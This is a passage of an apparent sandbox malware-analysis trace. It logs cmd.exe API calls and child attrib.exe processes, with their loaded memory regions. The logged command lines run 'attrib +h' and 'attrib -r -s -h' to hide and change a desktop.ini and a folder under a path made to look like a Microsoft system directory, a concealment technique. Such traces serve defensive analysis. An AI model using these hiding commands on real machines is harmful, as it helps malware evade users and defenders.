lpOverlapped=0x0) returned 1 [0147.765] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: 
lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.765] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.765] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.765] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.765] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.765] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.765] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.766] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.766] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.766] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, 
lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.766] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.766] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.766] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.766] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.766] ReadFile (in: hFile=0x58, lpBuffer=0x22eaa4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22dc94, lpOverlapped=0x0 | out: lpBuffer=0x22eaa4*, lpNumberOfBytesRead=0x22dc94*=0x200, lpOverlapped=0x0) returned 1 [0147.785] _close (_FileHandle=4) returned 0 [0147.785] FindNextFileW (in: hFindFile=0x29e768, lpFindFileData=0x22ed08 | out: lpFindFileData=0x22ed08) returned 0 [0147.785] GetLastError () returned 0x12 [0147.785] FindClose (in: hFindFile=0x29e768 | out: hFindFile=0x29e768) returned 1 [0147.785] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0147.788] _close (_FileHandle=3) returned 0 [0147.788] GetConsoleTitleW (in: lpConsoleTitle=0x22f140, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0147.789] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 
[0147.789] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0147.789] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0147.789] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x22e9dc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22e9dc) returned 0xffffffff [0147.789] GetLastError () returned 0x2 [0147.789] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x22e9dc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22e9dc) returned 0xffffffff [0147.789] GetLastError () returned 0x2 [0147.790] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x22e9dc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22e9dc) returned 0x2a2ed8 [0147.790] FindClose (in: hFindFile=0x2a2ed8 | out: hFindFile=0x2a2ed8) returned 1 [0147.790] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x22e9dc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22e9dc) returned 0xffffffff [0147.790] GetLastError () returned 0x2 [0147.790] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x22e9dc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22e9dc) returned 0x2a2ed8 [0147.790] FindClose (in: hFindFile=0x2a2ed8 | out: hFindFile=0x2a2ed8) returned 1 [0147.790] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0147.790] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0147.790] GetConsoleTitleW (in: lpConsoleTitle=0x22eed4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0147.790] 
InitializeProcThreadAttributeList (in: lpAttributeList=0x22ed5c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x22ee24 | out: lpAttributeList=0x22ed5c, lpSize=0x22ee24) returned 1 [0147.790] UpdateProcThreadAttribute (in: lpAttributeList=0x22ed5c, dwFlags=0x0, Attribute=0x60001, lpValue=0x22ee1c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x22ed5c, lpPreviousValue=0x0) returned 1 [0147.790] GetStartupInfoW (in: lpStartupInfo=0x22ed18 | out: lpStartupInfo=0x22ed18*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0147.791] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0147.791] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x22edb8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x22ee04 | out: lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini\" ", lpProcessInformation=0x22ee04*(hProcess=0x4c, hThread=0x50, dwProcessId=0xb60, dwThreadId=0xb0c)) returned 1 [0147.792] CloseHandle (hObject=0x50) returned 1 [0147.792] SetEnvironmentVariableW (lpName="COPYCMD", 
lpValue=0x0) returned 1 [0147.792] GetEnvironmentStringsW () returned 0x2a2ed8* [0147.792] FreeEnvironmentStringsW (penv=0x2a2ed8) returned 1 [0147.792] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0147.848] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x22ecf8 | out: lpExitCode=0x22ecf8*=0x0) returned 1 [0147.848] CloseHandle (hObject=0x4c) returned 1 [0147.848] _vsnwprintf (in: _Buffer=0x22ee40, _BufferCount=0x13, _Format="%08X", _ArgList=0x22ed04 | out: _Buffer="00000000") returned 8 [0147.848] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0147.848] GetEnvironmentStringsW () returned 0x2a2ed8* [0147.848] FreeEnvironmentStringsW (penv=0x2a2ed8) returned 1 [0147.848] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0147.848] GetEnvironmentStringsW () returned 0x2a2ed8* [0147.849] FreeEnvironmentStringsW (penv=0x2a2ed8) returned 1 [0147.849] DeleteProcThreadAttributeList (in: lpAttributeList=0x22ed5c | out: lpAttributeList=0x22ed5c) [0147.849] GetConsoleTitleW (in: lpConsoleTitle=0x22f140, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0147.849] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0147.849] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0147.849] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0147.849] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x22e9dc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22e9dc) returned 0xffffffff [0147.849] GetLastError () returned 0x2 [0147.850] FindFirstFileExW (in: 
lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x22e9dc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22e9dc) returned 0xffffffff [0147.850] GetLastError () returned 0x2 [0147.850] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x22e9dc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22e9dc) returned 0x29e768 [0147.850] FindClose (in: hFindFile=0x29e768 | out: hFindFile=0x29e768) returned 1 [0147.850] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x22e9dc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22e9dc) returned 0xffffffff [0147.850] GetLastError () returned 0x2 [0147.850] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x22e9dc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22e9dc) returned 0x29e768 [0147.850] FindClose (in: hFindFile=0x29e768 | out: hFindFile=0x29e768) returned 1 [0147.850] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0147.850] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0147.850] GetConsoleTitleW (in: lpConsoleTitle=0x22eed4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0147.850] InitializeProcThreadAttributeList (in: lpAttributeList=0x22ed5c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x22ee24 | out: lpAttributeList=0x22ed5c, lpSize=0x22ee24) returned 1 [0147.850] UpdateProcThreadAttribute (in: lpAttributeList=0x22ed5c, dwFlags=0x0, Attribute=0x60001, lpValue=0x22ee1c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x22ed5c, lpPreviousValue=0x0) returned 1 [0147.851] GetStartupInfoW (in: lpStartupInfo=0x22ed18 | out: lpStartupInfo=0x22ed18*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", 
lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0147.851] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0147.851] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x22edb8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x22ee04 | out: lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\"", lpProcessInformation=0x22ee04*(hProcess=0x50, hThread=0x4c, dwProcessId=0xa40, dwThreadId=0xba4)) returned 1 [0147.852] CloseHandle (hObject=0x4c) returned 1 [0147.852] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0147.852] GetEnvironmentStringsW () returned 0x2a3938* [0147.852] FreeEnvironmentStringsW (penv=0x2a3938) returned 1 [0147.852] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0147.920] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x22ecf8 | out: lpExitCode=0x22ecf8*=0x0) returned 1 [0147.920] CloseHandle (hObject=0x50) returned 1 [0147.920] _vsnwprintf (in: _Buffer=0x22ee40, _BufferCount=0x13, _Format="%08X", _ArgList=0x22ed04 | out: _Buffer="00000000") returned 8 [0147.920] SetEnvironmentVariableW (lpName="=ExitCode", 
lpValue="00000000") returned 1 [0147.920] GetEnvironmentStringsW () returned 0x2a3938* [0147.920] FreeEnvironmentStringsW (penv=0x2a3938) returned 1 [0147.920] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0147.920] GetEnvironmentStringsW () returned 0x2a3938* [0147.920] FreeEnvironmentStringsW (penv=0x2a3938) returned 1 [0147.920] DeleteProcThreadAttributeList (in: lpAttributeList=0x22ed5c | out: lpAttributeList=0x22ed5c) [0147.920] _get_osfhandle (_FileHandle=1) returned 0x7 [0147.920] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0147.921] _get_osfhandle (_FileHandle=1) returned 0x7 [0147.921] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0147.921] _get_osfhandle (_FileHandle=0) returned 0x3 [0147.921] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0147.921] SetConsoleInputExeNameW () returned 0x1 [0147.921] GetConsoleOutputCP () returned 0x1b5 [0147.921] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0147.921] SetThreadUILanguage (LangId=0x0) returned 0x409 [0147.921] exit (_Code=0) Process: id = "215" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea167e0" os_pid = "0xa88" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "214" os_parent_pid = "0xb74" cmd_line = "attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM 
Authentication" [0x7] Region: id = 18390 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 18391 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 18392 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 18393 start_va = 0x190000 end_va = 0x196fff entry_point = 0x190000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 18394 start_va = 0x230000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 18395 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 18396 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 18397 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 18398 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 18399 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 18400 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 18401 start_va = 0x20000 end_va = 0x2ffff entry_point = 
0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 18402 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 18403 start_va = 0xe0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 18404 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 18405 start_va = 0x6e2b0000 end_va = 0x6e2ccfff entry_point = 0x6e2b0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 18406 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 18407 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 18408 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 18409 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 18410 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 18411 start_va = 
0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 18412 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 18413 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 18414 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 18415 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 18416 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 18417 start_va = 0x430000 end_va = 0x4f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 18418 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 18419 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 273 os_tid = 0xa34 Process: id = "216" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" 
page_root = "0x7ea167e0" os_pid = "0xb60" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "214" os_parent_pid = "0xb74" cmd_line = "attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 18482 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 18483 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 18484 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 18485 start_va = 0xd0000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 18486 start_va = 0x240000 end_va = 0x246fff entry_point = 0x240000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 18487 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 18488 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: 
"c:\\windows\\system32\\apisetschema.dll") Region: id = 18489 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 18490 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 18491 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 18492 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 18493 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 18494 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 18495 start_va = 0x340000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 18496 start_va = 0x5b0000 end_va = 0x5bffff entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 18497 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 18498 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 18499 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: 
